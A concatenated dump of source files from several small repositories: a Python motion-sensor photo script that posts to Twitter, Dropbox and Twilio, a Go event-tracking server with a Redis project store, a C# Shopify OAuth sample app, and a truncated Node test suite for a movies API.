list with the Twitter link and Dropbox direct link.
"""

# Poll the motion sensor 15 times, five seconds apart.
# (Swap the for-loop for `while True:` to run indefinitely.)
for z in range(15):
    print("Sensor null, run = {0}".format(z))
    if pin.status:
        # Human-readable capture time, e.g. "14:7" (hour:minute).
        time_snap = "{0}:{1}".format(time.localtime().tm_hour, time.localtime().tm_min)
        # The original concatenated the `time` *module* here (a TypeError);
        # the timestamp string built just above was clearly intended.
        name = "Bambus_pije_o: " + time_snap
        pic_it.snap(name)      # rename the captured photo locally
        tweet_it.send(name)    # tweet the photo
        drop_it.upload(name)   # push it to Dropbox
        # The original imported/called `txt_it`, but the module file in this
        # repository is text_it.py.
        text_it.go(name)       # SMS the contact list via Twilio
    time.sleep(5)
<file_sep>/text_it.py
from twilio.rest import TwilioRestClient


def go(name):
    # Send an SMS (via Twilio) announcing the new photo; `name` doubles as
    # the message body.
    # NOTE(review): the Twilio credentials were redacted from this file,
    # leaving the two assignments below without a right-hand side -- the
    # module will not even parse until real values (or env-var lookups) are
    # restored. Also note main.py imports this module as `txt_it` while the
    # file is text_it.py.
    ACCOUNT_SID =
    AUTH_TOKEN =
    client = TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN)
    client.messages.create(
        to="8474449672",
        from_="+18474570275",
        body= name,
    )
<file_sep>/drop_it.py
import dropbox

"""
Uploads the file to dropbox
Generates download link
Returns download link
https://www.dropbox.com/developers/core/docs/python
"""


def upload(name):
    """Upload the captured photo to Dropbox and return its share URL.

    NOTE(review): despite taking ``name``, this function has always uploaded
    the hard-coded ``Golden.jpg`` -- behaviour preserved here; confirm
    whether ``name`` was meant to select the file.
    """
    app_key = 'xasdu3mcasb28iq'
    app_secret = '<KEY>'
    # TODO: restore the OAuth2 access token -- it was redacted from the
    # original source, which left a bare ``token =`` (a SyntaxError).
    token = ''
    #flow = dropbox.client.DropboxOAuth2FlowRedirect(app_key, app_secret)
    client = dropbox.client.DropboxClient(token)
    # Context manager closes the handle even if put_file raises (the
    # original leaked the file object on failure).
    with open("C:\\Python33\\Bambus\\Golden.jpg", 'rb') as f:
        response = client.put_file('/Golden.jpg', f)
    print("uploaded: ", response)
    x = client.share('/Golden.jpg')
    print(x)
    print("You can find the file at:")
    print(x["url"])
    return x["url"]
<file_sep>/tweet_it.py
from twython import Twython

# TODO: restore the Twitter API credentials -- they were redacted from the
# original source, leaving four bare assignments that do not parse.
APP_KEY = ''
APP_SECRET = ''
OAUTH_TOKEN = ''
OAUTH_TOKEN_SECRET = ''

twitter = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)


def send(name):
    """Tweet the photo saved as ``<name>.jpg`` with ``name`` as the status.

    NOTE(review): the original path read ``C:\\Pyhon33\\...`` -- a typo for
    ``Python33``, the directory every sibling module uses.
    """
    photo = open("C:\\Python33\\Bambus\\" + name + ".jpg", 'rb')
    try:
        twitter.update_status_with_media(status=name, media=photo)
    finally:
        # Close the handle even if the upload raises.
        photo.close()
| 4cb87ce5e66097560fdbeb12979f45b8eb9dea6b | [
"Markdown",
"Python"
] | 6 | Python | johnabfaria/bambus.py | ada2e5f5e411e55ccf6b51e96cbeda46b0e2fc24 | 3bddc7511e773ce18edcca33439acec6a4ec1e96 |
refs/heads/master | <repo_name>Kuew/landmarkd<file_sep>/core/event.go
package core

import (
	"time"
)

// Event is a single tracked occurrence: the moment it happened plus an
// arbitrary bag of property values captured at that moment. Timestamp is a
// pointer so an unset time serializes as JSON null rather than a zero time.
type Event struct {
	Timestamp *time.Time             `json:"timestamp"`
	Data      map[string]interface{} `json:"data"`
}
<file_sep>/projects/mock_test.go
package projects
import (
"net/http"
"github.com/skydb/sky.go"
"github.com/stretchr/testify/mock"
"time"
)
//--------------------------------------
// Redis Connection
//--------------------------------------
// mockRedisConn is a testify-backed stand-in for a redigo-style redis
// connection: each method records the call and replays whatever return
// values the test stubbed via On(...).Return(...).
type mockRedisConn struct {
	mock.Mock
}

// Close records the call and returns the stubbed error.
func (c *mockRedisConn) Close() error {
	args := c.Mock.Called()
	return args.Error(0)
}

// Err reports the stubbed connection error state.
func (c *mockRedisConn) Err() error {
	args := c.Mock.Called()
	return args.Error(0)
}

// Do records the command and its arguments (passed through as one slice,
// mirroring the variadic signature) and replays the stubbed reply/error.
// Receiver renamed from f to c for consistency with the other methods.
func (c *mockRedisConn) Do(commandName string, arg ...interface{}) (interface{}, error) {
	args := c.Mock.Called(commandName, arg)
	return args.Get(0), args.Error(1)
}

// Send records a buffered command and returns the stubbed error.
func (c *mockRedisConn) Send(commandName string, arg ...interface{}) error {
	args := c.Mock.Called(commandName, arg)
	return args.Error(0)
}

// Flush records the call and returns the stubbed error.
func (c *mockRedisConn) Flush() error {
	args := c.Mock.Called()
	return args.Error(0)
}

// Receive records the call and replays the stubbed reply/error pair.
func (c *mockRedisConn) Receive() (interface{}, error) {
	args := c.Mock.Called()
	return args.Get(0), args.Error(1)
}
//--------------------------------------
// Sky Client
//--------------------------------------
// mockSkyClient is a testify-backed stand-in for sky.Client: every method
// records its arguments and replays whatever the test stubbed with
// On(...).Return(...). Getter-style methods type-assert the stubbed value,
// so stubbing the wrong type panics at replay time.
type mockSkyClient struct {
	mock.Mock
}

func (c *mockSkyClient) GetTable(name string) (sky.Table, error) {
	args := c.Mock.Called(name)
	return args.Get(0).(sky.Table), args.Error(1)
}

func (c *mockSkyClient) GetTables() ([]sky.Table, error) {
	args := c.Mock.Called()
	return args.Get(0).([]sky.Table), args.Error(1)
}

func (c *mockSkyClient) CreateTable(table sky.Table) error {
	args := c.Mock.Called(table)
	return args.Error(0)
}

func (c *mockSkyClient) DeleteTable(table sky.Table) error {
	args := c.Mock.Called(table)
	return args.Error(0)
}

func (c *mockSkyClient) Ping() bool {
	args := c.Mock.Called()
	return args.Bool(0)
}

func (c *mockSkyClient) Send(method string, path string, data interface{}, ret interface{}) error {
	args := c.Mock.Called(method, path, data, ret)
	return args.Error(0)
}

func (c *mockSkyClient) URL(path string) string {
	args := c.Mock.Called(path)
	return args.String(0)
}

func (c *mockSkyClient) HTTPClient() *http.Client {
	args := c.Mock.Called()
	return args.Get(0).(*http.Client)
}
//--------------------------------------
// Sky Table
//--------------------------------------
// mockSkyTable is a testify-backed stand-in for sky.Table: every method
// records its arguments and replays whatever the test stubbed with
// On(...).Return(...). Getter-style methods type-assert the stubbed value,
// so stubbing the wrong type panics at replay time.
type mockSkyTable struct {
	mock.Mock
}

func (t *mockSkyTable) Name() string {
	args := t.Mock.Called()
	return args.String(0)
}

func (t *mockSkyTable) Client() sky.Client {
	args := t.Mock.Called()
	return args.Get(0).(sky.Client)
}

// SetClient only records the call; there is no return value to replay.
func (t *mockSkyTable) SetClient(client sky.Client) {
	t.Mock.Called(client)
}

func (t *mockSkyTable) GetProperty(name string) (*sky.Property, error) {
	args := t.Mock.Called(name)
	return args.Get(0).(*sky.Property), args.Error(1)
}

func (t *mockSkyTable) GetProperties() ([]*sky.Property, error) {
	args := t.Mock.Called()
	return args.Get(0).([]*sky.Property), args.Error(1)
}

func (t *mockSkyTable) CreateProperty(property *sky.Property) error {
	args := t.Mock.Called(property)
	return args.Error(0)
}

func (t *mockSkyTable) UpdateProperty(name string, property *sky.Property) error {
	args := t.Mock.Called(name, property)
	return args.Error(0)
}

func (t *mockSkyTable) DeleteProperty(property *sky.Property) error {
	args := t.Mock.Called(property)
	return args.Error(0)
}

func (t *mockSkyTable) GetEvent(objectId string, timestamp time.Time) (*sky.Event, error) {
	args := t.Mock.Called(objectId, timestamp)
	return args.Get(0).(*sky.Event), args.Error(1)
}

func (t *mockSkyTable) GetEvents(objectId string) ([]*sky.Event, error) {
	args := t.Mock.Called(objectId)
	return args.Get(0).([]*sky.Event), args.Error(1)
}

func (t *mockSkyTable) AddEvent(objectId string, event *sky.Event, method string) error {
	args := t.Mock.Called(objectId, event, method)
	return args.Error(0)
}

func (t *mockSkyTable) DeleteEvent(objectId string, event *sky.Event) error {
	args := t.Mock.Called(objectId, event)
	return args.Error(0)
}

func (t *mockSkyTable) Stream(f func(*sky.EventStream)) error {
	args := t.Mock.Called(f)
	return args.Error(0)
}

func (t *mockSkyTable) Stats() (*sky.Stats, error) {
	args := t.Mock.Called()
	return args.Get(0).(*sky.Stats), args.Error(1)
}

func (t *mockSkyTable) RawQuery(q map[string]interface{}) (map[string]interface{}, error) {
	args := t.Mock.Called(q)
	return args.Get(0).(map[string]interface{}), args.Error(1)
}
<file_sep>/README.md
landmarkd
=========
The Landmark Tracking Server.
<file_sep>/config/config.go
package config
import (
"github.com/BurntSushi/toml"
"io"
"os"
)
const (
	// DefaultPort is the HTTP port the server listens on when the
	// configuration does not override it.
	DefaultPort = 9500
	// DefaultPidPath is where the daemon writes its pid file by default.
	DefaultPidPath = "/var/run/landmarkd.pid"
)

// Config holds the runtime settings for landmarkd, decoded from TOML.
type Config struct {
	Port    int    `toml:"port"`
	PidPath string `toml:"pid-path"`
}

// NewConfig returns a configuration populated with the default values.
func NewConfig() *Config {
	return &Config{
		Port:     DefaultPort,
		PidPath:  DefaultPidPath,
	}
}

// Decode reads TOML from r into the configuration, overwriting any fields
// present in the input and leaving the rest untouched.
func (c *Config) Decode(r io.Reader) error {
	// c is already a pointer; pass it directly instead of the accidental
	// **Config indirection the previous `&c` produced.
	_, err := toml.DecodeReader(r, c)
	return err
}

// DecodeFile opens the TOML file at path and decodes it into the
// configuration. The file is closed before returning.
func (c *Config) DecodeFile(path string) error {
	f, err := os.Open(path)
	if err != nil {
		return err
	}
	defer f.Close()
	return c.Decode(f)
}
<file_sep>/projects/store.go
package projects
import (
"fmt"
"errors"
"github.com/skydb/sky.go"
"net/url"
)
// Store is the interface for looking up projects by API key.
type Store interface {
	// Open establishes the store's backing connection.
	Open() error
	// Close releases the backing connection.
	Close()
	// FindByApiKey returns the project registered under the given API key.
	FindByApiKey(string) (*Project, error)
}
// NewStore creates a store based on a connection URI. Only the "redis"
// scheme is currently supported; any other scheme is an error.
func NewStore(client sky.Client, uri string) (Store, error) {
	if client == nil {
		return nil, errors.New("Sky client required for project store")
	}

	u, err := url.Parse(uri)
	if err != nil {
		return nil, err
	}

	if u.Scheme == "redis" {
		return NewRedisStore(client, u), nil
	}
	return nil, fmt.Errorf("Invalid store scheme: %s", u.Scheme)
}
<file_sep>/server/server.go
package server
import (
"fmt"
"github.com/gorilla/mux"
"log"
"net/http"
)
// Server wraps an HTTP server with a gorilla/mux route table.
type Server struct {
	router     *mux.Router  // route table; populated in ListenAndServe
	httpServer *http.Server // underlying server; nil until ListenAndServe
}
// New creates a server with an empty route table.
func New() *Server {
	s := new(Server)
	s.router = mux.NewRouter()
	return s
}
// ListenAndServe registers the tracking routes and starts the HTTP
// server on the given port. It blocks until the server exits and
// returns its error.
func (s *Server) ListenAndServe(port int) error {
	s.httpServer = &http.Server{
		Addr:    fmt.Sprintf(":%d", port),
		Handler: s.router,
	}

	// Both the bare endpoint and the 1x1-gif variant use the same handler.
	s.router.HandleFunc("/track", s.trackHandler).Methods("GET")
	s.router.HandleFunc("/track.gif", s.trackHandler).Methods("GET")

	log.Printf("Running at http://localhost%s/", s.httpServer.Addr)
	return s.httpServer.ListenAndServe()
}
// Tracks a single event to a project. Currently a stub: it accepts the
// request and returns an empty 200 without recording anything.
func (s *Server) trackHandler(w http.ResponseWriter, r *http.Request) {
	// TODO: Parse query parameters.
	// TODO: Lookup project by API Key.
	// TODO: Send event against project.
}
<file_sep>/core/device.go
package core
// Device identifies the device an event originated from.
type Device struct {
	Id string `json:"id"` // opaque device identifier
}
<file_sep>/config/config_test.go
package config
import (
"bytes"
"testing"
"github.com/stretchr/testify/assert"
)
const testConfig = `
port=9000
pid-path = "/home/pid"
`
// TestDecode verifies that TOML input overrides the default port and
// pid path.
func TestDecode(t *testing.T) {
	config := NewConfig()
	err := config.Decode(bytes.NewBufferString(testConfig))
	assert.Nil(t, err)
	// testify's assert.Equal takes (t, expected, actual); the original
	// passed the arguments reversed, which yields misleading
	// "expected X, got Y" messages on failure.
	assert.Equal(t, 9000, config.Port)
	assert.Equal(t, "/home/pid", config.PidPath)
}
<file_sep>/main.go
package main
import (
"flag"
"io/ioutil"
"log"
"os"
"runtime"
"strconv"
. "github.com/skylandlabs/landmarkd/config"
"github.com/skylandlabs/landmarkd/server"
)
var config *Config
var configPath string
// init builds the default configuration and registers the -c flag for
// overriding it with a TOML file.
func init() {
	config = NewConfig()
	flag.StringVar(&configPath, "c", "", "the path to the config file")
}
// main parses flags, optionally loads a config file, writes the pid
// file, and runs the HTTP server until it exits.
func main() {
	flag.Parse()

	// An explicit config file overrides the compiled-in defaults.
	if configPath != "" {
		if err := config.DecodeFile(configPath); err != nil {
			log.Fatal("Config error:", err)
		}
	}

	// Initialize.
	runtime.GOMAXPROCS(runtime.NumCPU())
	writePidFile()

	// Run server. ListenAndServe blocks; log.Fatal fires on exit/error.
	s := server.New()
	log.Fatal(s.ListenAndServe(config.Port))
}
// writePidFile records the current process id at the configured path so
// external tooling can signal the daemon. A failure is logged rather
// than fatal — the server can run without a pid file. (The original
// silently discarded WriteFile's error.)
func writePidFile() {
	pid := strconv.Itoa(os.Getpid())
	if err := ioutil.WriteFile(config.PidPath, []byte(pid), 0644); err != nil {
		log.Printf("Unable to write pid file %s: %v", config.PidPath, err)
	}
}
<file_sep>/projects/redis_store.go
package projects
import (
"fmt"
"github.com/garyburd/redigo/redis"
"github.com/skydb/sky.go"
"net/url"
"sync"
)
// RedisStore resolves API keys to projects using a Redis hash, caching
// resolved projects in memory. The embedded mutex guards conn and
// projects.
type RedisStore struct {
	sync.Mutex
	client   sky.Client          // Sky client used to resolve table names
	uri      *url.URL            // redis://host:port[/hashkey]
	conn     redis.Conn          // live connection; nil when closed
	projects map[string]*Project // cache keyed by API key
}
// NewRedisStore creates a Redis-backed project store. The connection is
// not opened until Open is called.
func NewRedisStore(client sky.Client, uri *url.URL) *RedisStore {
	store := new(RedisStore)
	store.client = client
	store.uri = uri
	store.projects = map[string]*Project{}
	return store
}
// Host returns the "host:port" portion of the store's URI, as passed to
// redis.Dial.
func (s *RedisStore) Host() string {
	return s.uri.Host
}
// HashKey returns the Redis hash key used to look up projects. It is
// taken from the URI path (without the leading slash) and falls back to
// "ldmk_projects" when no path is given. The original only checked for
// an empty path, so a bare trailing slash ("redis://host/") produced an
// empty hash key; paths shorter than two characters now also use the
// default.
func (s *RedisStore) HashKey() string {
	if len(s.uri.Path) < 2 {
		return "ldmk_projects"
	}
	return s.uri.Path[1:]
}
// Open establishes a TCP connection to Redis, first closing any
// connection that is already open. Safe for concurrent use.
func (s *RedisStore) Open() error {
	s.Lock()
	defer s.Unlock()

	// Close the store if it's already open.
	s.close()

	// Open a new connection to Redis.
	var err error
	if s.conn, err = redis.Dial("tcp", s.Host()); err != nil {
		return err
	}
	return nil
}
// Close releases the Redis connection. Safe for concurrent use and safe
// to call on an already-closed store.
func (s *RedisStore) Close() {
	s.Lock()
	defer s.Unlock()
	s.close()
}
// close tears down the connection without locking; callers must hold
// the store's mutex.
func (s *RedisStore) close() {
	if s.conn != nil {
		s.conn.Close()
		s.conn = nil
	}
}
// FindByApiKey looks up a project by API key. The store checks its
// in-memory cache first and only consults Redis on a miss; resolved
// projects are cached for subsequent lookups.
func (s *RedisStore) FindByApiKey(apiKey string) (*Project, error) {
	s.Lock()
	defer s.Unlock()

	// Find local reference to project.
	p := s.projects[apiKey]

	// If project doesn't exist then find it from Redis.
	if p == nil {
		// Find project from Redis.
		reply, err := s.conn.Do("HGET", s.HashKey(), apiKey)
		if err != nil {
			return nil, err
		}

		// redigo returns bulk string replies as []byte, while the test
		// mock returns string. The original asserted only on string, so
		// every lookup against a real Redis server fell through to
		// "Project not found". Accept both representations.
		var tableName string
		switch v := reply.(type) {
		case []byte:
			tableName = string(v)
		case string:
			tableName = v
		default:
			return nil, fmt.Errorf("Project not found: %s (%v)", apiKey, reply)
		}

		table, err := s.client.GetTable(tableName)
		if err != nil {
			return nil, err
		}
		p = New(apiKey, table)
		s.projects[apiKey] = p
	}
	return p, nil
}
<file_sep>/core/user.go
package core
// User is an end user tracked by a project.
type User struct {
	Id     string                 `json:"id"`     // user identifier within a project
	Traits map[string]interface{} `json:"traits"` // arbitrary user attributes
}
<file_sep>/projects/project.go
package projects
import (
"github.com/skydb/sky.go"
"github.com/skylandlabs/landmarkd/core"
)
// A Project is a collection of users and their events. In the landmarkd
// process, a Project simply links API keys to the table the project is
// stored on.
type Project struct {
	ApiKey string    // public API key identifying the project
	table  sky.Table // Sky table that backs the project's data
}
// New creates a Project linking an API key to its backing Sky table.
func New(apiKey string, table sky.Table) *Project {
	p := new(Project)
	p.ApiKey = apiKey
	p.table = table
	return p
}
// Track records an event for a user/device against the project's table.
// Currently a stub: it accepts the arguments and returns nil without
// persisting anything.
func (p *Project) Track(user *core.User, device *core.Device, event *core.Event) error {
	// TODO: Create a Sky event.
	// TODO: Save to Sky.
	return nil
}
<file_sep>/projects/redis_store_test.go
package projects
import (
"github.com/stretchr/testify/assert"
"testing"
)
// newRedisStore builds a RedisStore wired to mock Sky and Redis
// dependencies for testing, returning the store and its mocks. The mock
// connection is injected directly so no real Redis is contacted.
func newRedisStore() (*RedisStore, *mockRedisConn, *mockSkyClient, *mockSkyTable) {
	table := new(mockSkyTable)
	client := new(mockSkyClient)
	conn := new(mockRedisConn)
	s, err := NewStore(client, "redis://localhost:6379")
	if err != nil {
		panic(err)
	}
	store := s.(*RedisStore)
	store.conn = conn
	return store, conn, client, table
}
// Ensure that the store will find a project by API key and cache it.
func TestRedisStoreFindByApiKey(t *testing.T) {
	store, conn, client, table := newRedisStore()
	// Stub Redis to map API key "XXX" to table "myTable", and Sky to
	// resolve that table name.
	client.On("GetTable", "myTable").Return(table, nil)
	conn.On("Do", "HGET", []interface{}{"ldmk_projects", "XXX"}).Return("myTable", nil)

	// Search for a project by API key.
	p, err := store.FindByApiKey("XXX")
	assert.Nil(t, err)
	assert.Equal(t, p.ApiKey, "XXX")
	assert.Equal(t, p.table, table)

	// Search for the same project. Should receive cached copy.
	p2, err := store.FindByApiKey("XXX")
	assert.Nil(t, err)
	assert.Equal(t, p, p2)
	client.AssertExpectations(t)
	conn.AssertExpectations(t)
}
| 7606b4feb3a8587a08c9a4359edae8eaf3631502 | [
"Markdown",
"Go"
] | 13 | Go | Kuew/landmarkd | b10823de4e69771f63701876cf17331cf8b3adc8 | 034a781489a9f40cd9196b2859de1e7f83ae8181 |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.Json.Serialization;
using System.Threading.Tasks;
namespace Shopify_HelloWorld_dotNet.Models
{
/// <summary>
/// Request envelope for Shopify's webhook subscription endpoint; the API
/// expects the payload wrapped in a "webhook" property.
/// </summary>
public class WebHookSubscriptionRequest
{
    public WebHook webhook { get; set; }
}
/// <summary>
/// Webhook subscription details. Property names are lower-case to match
/// Shopify's JSON wire format used by the default serializer settings.
/// </summary>
public class WebHook
{
    public string topic { get; set; }   // event topic, e.g. "products/create"
    public string address { get; set; } // callback URL Shopify will POST to
    public string format { get; set; }  // payload format, e.g. "json"
}
}
<file_sep>using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Logging;
using Shopify_HelloWorld_dotNet.Models;
using System;
using System.Collections;
using System.IO;
using System.Linq;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Security.Cryptography;
using System.Text;
using System.Text.Json;
using System.Threading.Tasks;
using System.Web;
namespace Shopify_HelloWorld_dotNet.Controllers
{
[ApiController]
/// <summary>
/// Implements a minimal Shopify OAuth install flow: redirect to the shop's
/// authorize page, verify the callback (nonce + HMAC), exchange the code
/// for an access token, and register a product-creation webhook.
/// </summary>
public class DefaultController : ControllerBase
{
    private readonly ILogger<DefaultController> _logger;
    private readonly IConfiguration _config;
    // OAuth scopes requested during install.
    private const string scopes = "read_products";
    // NOTE(review): allocating an HttpClient per controller instance can
    // exhaust sockets under load; consider IHttpClientFactory — TODO confirm.
    private readonly HttpClient _client;

    public DefaultController(ILogger<DefaultController> logger, IConfiguration config)
    {
        _logger = logger;
        _config = config;
        _client = new HttpClient();
    }

    /// <summary>Root endpoint; simple liveness response.</summary>
    [HttpGet]
    [Route("/")]
    public ActionResult Callback()
    {
        return new JsonResult("Hello World");
    }

    /// <summary>
    /// Starts the install flow: stores a nonce in a "state" cookie and
    /// redirects the merchant to the shop's OAuth authorize URL.
    /// </summary>
    [HttpGet]
    [Route("shopify")]
    public ActionResult Install([FromQuery] string shop)
    {
        var callbackUrl = _config["CallbackUrl"];
        var apiKey = _config["ApiKey"];
        var nonce = CreateNonce();
        var redirectUri = $"{callbackUrl}/shopify/callback";
        var installUri = $"https://{shop}/admin/oauth/authorize?client_id={apiKey}&scope={scopes}&state={nonce}&redirect_uri={redirectUri}";

        // The nonce comes back as "state" and is verified in Callback below.
        HttpContext.Response.Cookies.Append("state", nonce);
        return Redirect(installUri);
    }

    /// <summary>
    /// OAuth callback: verifies the state nonce and HMAC of the query
    /// string, exchanges the authorization code for an access token, then
    /// registers a webhook subscription on the shop.
    /// </summary>
    [HttpGet]
    [Route("shopify/callback")]
    public async Task<ActionResult> Callback([FromQuery] string shop, [FromQuery] string hmac, [FromQuery] string code, [FromQuery] string state)
    {
        var nonce = HttpContext.Request.Cookies["state"];
        if (!state.Equals(nonce))
        {
            return Unauthorized("Request origin cannot be verified");
        }

        var apiSecret = _config["ApiSecret"];
        var apiKey = _config["ApiKey"];

        //Validate hmac: Shopify signs all query parameters except "hmac".
        var validateQueryString = HttpUtility.ParseQueryString(HttpContext.Request.QueryString.Value);
        validateQueryString.Remove("hmac");

        //Sort the keys lexographically
        var sortedKeys = validateQueryString.AllKeys.OrderBy(r => r);
        var parsedQueryString = new StringBuilder();
        foreach (var key in sortedKeys)
        {
            parsedQueryString.Append($"&{key}={validateQueryString[key]}");
        }
        //Remove the first &
        parsedQueryString.Remove(0, 1);

        // NOTE(review): string comparison of HMACs is not constant-time;
        // consider CryptographicOperations.FixedTimeEquals — TODO confirm.
        var hashedQueryString = HashHMAC(StringEncode(apiSecret), StringEncode(parsedQueryString.ToString()));
        if (!hashedQueryString.Equals(hmac, StringComparison.OrdinalIgnoreCase))
        {
            return Unauthorized("HMAC is invalid");
        }

        //Get an access token by exchanging the authorization code.
        var response = await _client.PostAsync($"https://{shop}/admin/oauth/access_token", new StringContent(
            JsonSerializer.Serialize<TokenRequestPayload>(new TokenRequestPayload()
            {
                client_id = apiKey,
                client_secret = apiSecret,
                code = code
            }), Encoding.UTF8, "application/json"));

        if (response.IsSuccessStatusCode)
        {
            var responseData = JsonSerializer.Deserialize<TokenResponsePayload>(await response.Content.ReadAsStringAsync());
            return new JsonResult(await CreateWebHookSubscription(responseData.access_token, shop));
        }

        return new JsonResult("Something went wrong!");
    }

    /// <summary>
    /// Webhook receiver for product-creation events. The body is read and
    /// discarded; a 200 acknowledges receipt to Shopify.
    /// </summary>
    [HttpPost]
    [Route("shopify/newcart")]
    public async Task<ActionResult> NewProduct()
    {
        using (var reader = new StreamReader(Request.Body))
        {
            var body = await reader.ReadToEndAsync();
        }
        return Ok();
    }

    /// <summary>
    /// Fetches the shop's metadata JSON; returns an empty string on any
    /// non-success status.
    /// </summary>
    private async Task<string> GetShopDataAsync(string accessToken, string shop)
    {
        using (var requestMessage =
            new HttpRequestMessage(HttpMethod.Get, $"https://{shop}/admin/api/2020-04/shop.json"))
        {
            requestMessage.Headers.TryAddWithoutValidation("X-Shopify-Access-Token", accessToken);
            var response = await _client.SendAsync(requestMessage);
            if (response.IsSuccessStatusCode)
            {
                return await response.Content.ReadAsStringAsync();
            }
        }
        return string.Empty;
    }

    /// <summary>
    /// Registers a "products/create" webhook pointing at this app's
    /// /shopify/newcart endpoint and returns Shopify's raw response body.
    /// </summary>
    private async Task<string> CreateWebHookSubscription(string accessToken, string shop)
    {
        var apiSecret = _config["ApiSecret"];
        var apiKey = _config["ApiKey"];
        var callbackUrl = _config["CallbackUrl"];
        using (var requestMessage =
            new HttpRequestMessage(HttpMethod.Post, $"https://{shop}/admin/api/2020-04/webhooks.json"))
        {
            requestMessage.Headers.TryAddWithoutValidation("X-Shopify-Access-Token", accessToken);
            requestMessage.Content = new StringContent(
                JsonSerializer.Serialize<WebHookSubscriptionRequest>(new WebHookSubscriptionRequest()
                {
                    webhook = new WebHook()
                    {
                        address = $"{callbackUrl}/shopify/newcart",
                        format = "json",
                        topic = "products/create"
                    }
                }), Encoding.UTF8, "application/json");
            var response = await _client.SendAsync(requestMessage);
            return await response.Content.ReadAsStringAsync();
        }
    }

    /// <summary>Generates a random base64 nonce for the OAuth state.</summary>
    private string CreateNonce()
    {
        var ByteArray = new byte[20];
        using (var Rnd = RandomNumberGenerator.Create())
        {
            Rnd.GetBytes(ByteArray);
        }
        return Convert.ToBase64String(ByteArray);
    }

    /// <summary>
    /// Computes a lower-case hex HMAC-SHA256 of message with key.
    /// NOTE(review): the HMACSHA256 instance is not disposed — TODO confirm.
    /// </summary>
    private string HashHMAC(byte[] key, byte[] message)
    {
        var hash = new HMACSHA256(key);
        return BitConverter.ToString(hash.ComputeHash(message)).Replace("-", "").ToLower();
    }

    /// <summary>UTF-8 encodes a string.</summary>
    private byte[] StringEncode(string text)
    {
        var encoding = new UTF8Encoding();
        return encoding.GetBytes(text);
    }
}
}
| 66817b3a248061b114f424a6be4864fc94a57570 | [
"C#"
] | 2 | C# | sstefanovich/shopify-hello-world-dotnet | ae1ecf0e7ba3a306f0934d792965cb98564b1a87 | 05d0fedee71b33dfc8d242620b64eff64d78ed8b |
refs/heads/master | <repo_name>fossabot/movies-api<file_sep>/test/index.test.js
/* eslint-disable */
let chai = require('chai')
let expect = chai.expect
let request = require('supertest')
let server = require('../index')
// Tests for GET /movies: listing, limit handling, field selection, sorting.
// Assertion failures inside .then are now forwarded to mocha via
// .catch(done); the original logged them with console.error, which left
// failing tests to die as timeouts instead of reporting the real error.
describe('GET /movies', () => {
  it('works with no parameters', done => {
    request(server)
      .get('/movies')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
  it('works with limit 5', done => {
    request(server)
      .get('/movies?limit=5')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        const length = res.body.length
        expect(length).to.be.at.most(5)
        done()
      })
      .catch(done)
  })
  it('works with limit 0', done => {
    request(server)
      .get('/movies?limit=0')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect('Content-Length', '2')
      .expect(200)
      .then(res => {
        expect(res.body.length).to.be.equal(0)
        done()
      })
      .catch(done)
  })
  it('works with negative limit', done => {
    request(server)
      .get('/movies?limit=-5')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
  it('works with only title field', done => {
    request(server)
      .get('/movies?fields=Title')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        expect(res.body[0]).to.have.keys('Title')
        done()
      })
      .catch(done)
  })
  it('works with only plot field', done => {
    request(server)
      .get('/movies?fields=Plot')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        expect(res.body[0]).to.have.keys('Plot')
        done()
      })
      .catch(done)
  })
  it('works with unknown fields', done => {
    request(server)
      .get('/movies?fields=Plsgsot')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
  it('works with sorting', done => {
    request(server)
      .get('/movies?sort=Year')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        // Ascending sort: first result's year is <= the second's.
        expect(parseInt(res.body[0].Year)).to.be.at.most(parseInt(res.body[1].Year))
        done()
      })
      .catch(done)
  })
  it('does its job with bizarre data', done => {
    request(server)
      .get('/movies?hakunamatata=dontworry')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
})
// Tests for POST /movies: validation, OMDb lookup results, unknown titles.
// Failures inside .then are forwarded to mocha via .catch(done) (the
// original swallowed them with console.error and timed out).
describe('POST /movies', () => {
  it('throws error on no paramaters', done => {
    request(server)
      .post('/movies')
      .expect(400, done)
  })
  it('adds movie to the database', done => {
    request(server)
      .post('/movies')
      .send('title=Jaws')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .then(res => {
        const body = res.body
        // 200 (already present) and 201 (created) are both acceptable.
        expect(res.status).to.be.oneOf([200, 201])
        expect(body.Title).to.equal('Jaws')
        expect(body.Year).to.equal('1975')
        expect(body.Rated).to.equal('PG')
        expect(body.Response).to.equal('True')
        done()
      })
      .catch(done)
  })
  it('throws error when movie not found', done => {
    request(server)
      .post('/movies')
      .send('title=asjdofjhuishadfadfiodsi')
      .expect(404, done)
  })
  it('works fine with strange data', done => {
    request(server)
      .post('/movies')
      .send('title=Jaws')
      .send('ihearthedrums=echoingtonight')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        const body = res.body
        expect(body.Title).to.equal('Jaws')
        expect(body.Year).to.equal('1975')
        expect(body.Rated).to.equal('PG')
        expect(body.Response).to.equal('True')
        done()
      })
      .catch(done)
  })
})
// Tests for GET /comments: listing, limit handling, field selection.
// Failures inside .then are forwarded to mocha via .catch(done) (the
// original swallowed them with console.error and timed out).
describe('GET /comments', () => {
  it('works with no parameters', done => {
    request(server)
      .get('/comments')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
  it('works with limit 5', done => {
    request(server)
      .get('/comments?limit=5')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        const length = res.body.length
        expect(length).to.be.at.most(5)
        done()
      })
      .catch(done)
  })
  it('works with limit 0', done => {
